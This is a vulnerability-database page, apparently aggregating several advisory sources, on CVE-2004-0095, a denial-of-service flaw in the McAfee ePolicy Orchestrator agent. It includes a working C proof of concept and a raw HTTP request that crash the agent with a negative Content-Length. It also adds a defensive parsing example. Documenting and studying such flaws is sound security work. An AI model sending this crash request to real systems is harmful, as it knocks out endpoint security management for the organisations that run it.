CVE-2004-0095
CVSS 5.0
Published: 2004-02-17 00:00:00
Last modified: 2008-09-05 16:37:31

[Original] McAfee ePolicy Orchestrator agent allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value, possibly triggering a buffer overflow.


[CNNVD] McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability (CNNVD-200402-083)

        
McAfee Security ePolicy Orchestrator is an enterprise-grade anti-virus management tool.
The McAfee ePolicy Orchestrator agent has a buffer management flaw that a remote attacker can exploit to mount a denial-of-service attack against the program.
An attacker can submit an HTTP POST request containing certain malicious values; because ePolicy Orchestrator does not filter them sufficiently, the affected agent can crash. Although unconfirmed, the flaw is believed to allow an attacker to trigger a buffer overflow.

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0095
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-083
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/9476
(VENDOR_ADVISORY)  BID  9476
http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
(UNKNOWN)  CONFIRM  http://download.nai.com/products/patches/ePO/v3.1.0/EPO3013.zip
http://xforce.iss.net/xforce/xfdb/14989
(UNKNOWN)  XF  epolicy-contentlength-post-dos(14989)
http://www.osvdb.org/3744
(UNKNOWN)  OSVDB  3744

- Vulnerability information

McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Medium severity  Boundary condition error
2004-02-17 00:00:00  2005-05-13 00:00:00
Remote

- Advisories and patches

Vendor patch:
McAfee
------
The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

http://www.mcafee.com/

- Vulnerability information (23584)

McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent HTTP POST Buffer Mismanagement Vulnerability (EDBID:23584)
windows dos
2004-01-22 Verified
0 cyber_flash
source: http://www.securityfocus.com/bid/9476/info

The McAfee ePolicy Orchestrator agent has been reported to have a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.

The issue reportedly presents itself because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.

/*

 >McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability PoC

 >Ref            :  http://securityfocus.com/bid/9476
 >discovered by  :  cyber_flash@hotmail.com


"
The McAfee ePolicy Orchestrator agent has been reported to have a buffer
management vulnerability that may be exploited to crash the affected
agent. Although unconfirmed, it has been reported that the issue may also
allow a remote attacker to trigger a buffer overflow vulnerability.

The issue reportedly presents itself because certain values in HTTP POST
headers processed by the ePolicy Orchestrator are not sufficiently
sanitized.
"


>Hi NA-eye ;-) . Hurry-yup . release a patch guyz !


                                 + PoC by Shashank Pandey a.k.a G0D_0F_z10N +

> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while
i wuz writing this..!

> lame coding ..dont think too much abt it...

*/


#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strlen() */

#pragma comment (lib,"ws2_32")


int main(int argc, char *argv[])
{
  WSADATA wsaData;
  SOCKET s;
  struct hostent *yo;
  struct sockaddr_in wutever;

  /* The request head from the advisory: the Content-Length value is the
     invalid (negative) value the agent fails to sanitize. */
  char badb0y[] =
    "POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0\r\n"
    "Accept: application/octet-stream\r\n"
    "Accept-Language: en-us\r\n"
    "Content-Type: application/octet-stream\r\n"
    "User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0; Windows)\r\n"
    "Host: EPO_DIE\r\n"
    "Content-Length: -1\r\n"
    "Connection: Keep-Alive\r\n\r\n";

  printf("\n--------------------------------- ");
  printf("\n McAfee ePO agent overflow PoC    \n");
  printf("+++++++++++++++++++++++++++++++++\n");
  printf(" by Shashank Pandey              \n");
  printf(" (reach_shash@linuxmail.org)     \n");
  printf("--------------------------------- \n");

  if (WSAStartup(0x0101, &wsaData) != 0) {
    printf("Error :Cudn't initiate winsock!");
    return 0;
  }

  if (argc < 2) {
    printf("\nUsage : %s <I.P./Hostname>\n\n", argv[0]);
    exit(0);
  }

  if ((yo = gethostbyname(argv[1])) == 0) {
    printf("error: can't resolve '%s'", argv[1]);
    return 1;
  }

  wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to communicate on port 8081
  wutever.sin_family = AF_INET;
  wutever.sin_addr = *((struct in_addr *)yo->h_addr);

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
    printf("error: can't create socket");
    return 1;
  }

  if (connect(s, (struct sockaddr *)&wutever, sizeof(wutever)) == SOCKET_ERROR) {
    printf("Error:Cudn't Connect\r\n");
    return 1;
  }

  printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");

  /* Send only the request head; no body follows the bogus Content-Length. */
  send(s, badb0y, (int)strlen(badb0y), 0);

  closesocket(s);
  WSACleanup();

  return 1;
}

- Vulnerability information

3744
McAfee ePolicy Orchestrator Invalid Content-Length DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Commercial

- Vulnerability description

McAfee ePolicy Orchestrator contains a flaw that may allow a remote denial of service. The issue is triggered when McAfee ePolicy Orchestrator receives an HTTP POST request containing an invalid value in the "Content-Length:" header, and results in loss of availability for the Orchestrator Agent.

- Timeline

2004-01-29 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, McAfee has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Boundary Condition Error 9476
Yes No
2004-01-22 12:00:00 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to <cyber_flash@hotmail.com>.

- Affected program versions

McAfee ePolicy Orchestrator 3.0
McAfee ePolicy Orchestrator 2.5.1
McAfee ePolicy Orchestrator 2.5 SP1
McAfee ePolicy Orchestrator 2.5
McAfee ePolicy Orchestrator 2.0
McAfee ePolicy Orchestrator 1.1
McAfee ePolicy Orchestrator 1.0

- Exploit

The following proof-of-concept has been supplied:

POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive
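The request above stands or falls on one header: a Content-Length of -1 that the agent trusts. The added example below is not part of the BID record or of the PoC; it is illustrative C written for this page showing how a receiver should treat that field: parse only unsigned decimal digits, reject a sign or any other character, refuse values that would wrap or exceed a configured ceiling, and refuse conflicting duplicate headers. MAX_BODY_BYTES and the sample requests are constructed assumptions, not values from the ePO agent.

```c
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Assumed ceiling for an upload body; a real service would configure this. */
#define MAX_BODY_BYTES (16UL * 1024UL * 1024UL)

enum cl_status { CL_OK = 0, CL_MISSING = 1, CL_INVALID = 2, CL_TOO_LARGE = 3 };

/* Case-insensitive compare of exactly n bytes (header names are case-insensitive). */
static int ieq(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Scan a request head (request line + headers, CRLF-terminated) for
 * Content-Length and parse it strictly. On CL_OK, *out holds the value. */
enum cl_status parse_content_length(const char *req, unsigned long *out)
{
    const char *p = strstr(req, "\r\n");
    int found = 0;
    if (!p) return CL_MISSING;
    p += 2;                                   /* skip the request line */
    while (*p && !(p[0] == '\r' && p[1] == '\n')) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        const char *colon = memchr(p, ':', len);
        if (colon && (size_t)(colon - p) == 14 && ieq(p, "Content-Length", 14)) {
            const char *v = colon + 1, *vend = p + len;
            unsigned long val = 0;
            while (v < vend && (*v == ' ' || *v == '\t')) v++;           /* trim OWS */
            while (vend > v && (vend[-1] == ' ' || vend[-1] == '\t')) vend--;
            if (v == vend) return CL_INVALID;                             /* empty value */
            for (; v < vend; v++) {
                if (!isdigit((unsigned char)*v)) return CL_INVALID;      /* "-1", "+5", "0x10" */
                unsigned d = (unsigned)(*v - '0');
                if (val > (ULONG_MAX - d) / 10) return CL_TOO_LARGE;     /* would wrap */
                val = val * 10 + d;
                if (val > MAX_BODY_BYTES) return CL_TOO_LARGE;
            }
            if (found && val != *out) return CL_INVALID;   /* conflicting duplicates */
            *out = val;
            found = 1;
        }
        if (!eol) break;
        p = eol + 2;
    }
    return found ? CL_OK : CL_MISSING;
}

/* Constructed sample request heads (not captured traffic). REQ_NEGATIVE has
 * the same shape as the public PoC for this issue: a negative Content-Length. */
static const char REQ_NEGATIVE[] =
    "POST /spipe/pkg HTTP/1.0\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: -1\r\n"
    "Connection: Keep-Alive\r\n\r\n";
static const char REQ_GOOD[] = "POST /spipe/pkg HTTP/1.0\r\ncontent-length: 512\r\n\r\n";
static const char REQ_HUGE[] = "POST /spipe/pkg HTTP/1.0\r\nContent-Length: 99999999999999999999\r\n\r\n";
static const char REQ_NONE[] = "POST /spipe/pkg HTTP/1.0\r\nHost: x\r\n\r\n";
static const char REQ_DUP[]  = "POST /spipe/pkg HTTP/1.0\r\nContent-Length: 10\r\nContent-Length: 20\r\n\r\n";

static const char *status_name(enum cl_status s)
{
    static const char *names[] = { "CL_OK", "CL_MISSING", "CL_INVALID", "CL_TOO_LARGE" };
    return names[s];
}

int main(void)
{
    const char *samples[] = { REQ_NEGATIVE, REQ_GOOD, REQ_HUGE, REQ_NONE, REQ_DUP };
    const char *labels[]  = { "negative", "good", "huge", "none", "duplicate" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        unsigned long n = 0;
        enum cl_status st = parse_content_length(samples[i], &n);
        printf("%-9s -> %s", labels[i], status_name(st));
        if (st == CL_OK) printf(" (%lu bytes)", n);
        printf("\n");
    }
    return 0;
}
```

Only a CL_OK result should be allowed to size a buffer or drive a read loop; every other status should end the request before any body bytes are consumed. The duplicate-header check is not needed for this particular bug but belongs in the same place, since it is the other classic way a length field is made to disagree with the body.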

The following exploit has been provided by Shashank Pandey:

- Solution

The vendor has released fixes.

McAfee ePolicy Orchestrator 1.0
McAfee ePolicy Orchestrator 1.1
McAfee ePolicy Orchestrator 2.0
McAfee ePolicy Orchestrator 2.5 SP1
McAfee ePolicy Orchestrator 2.5
McAfee ePolicy Orchestrator 2.5.1
McAfee ePolicy Orchestrator 3.0

- References

About the SCAP Chinese Community

SCAP中文社区 is the first Chinese open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites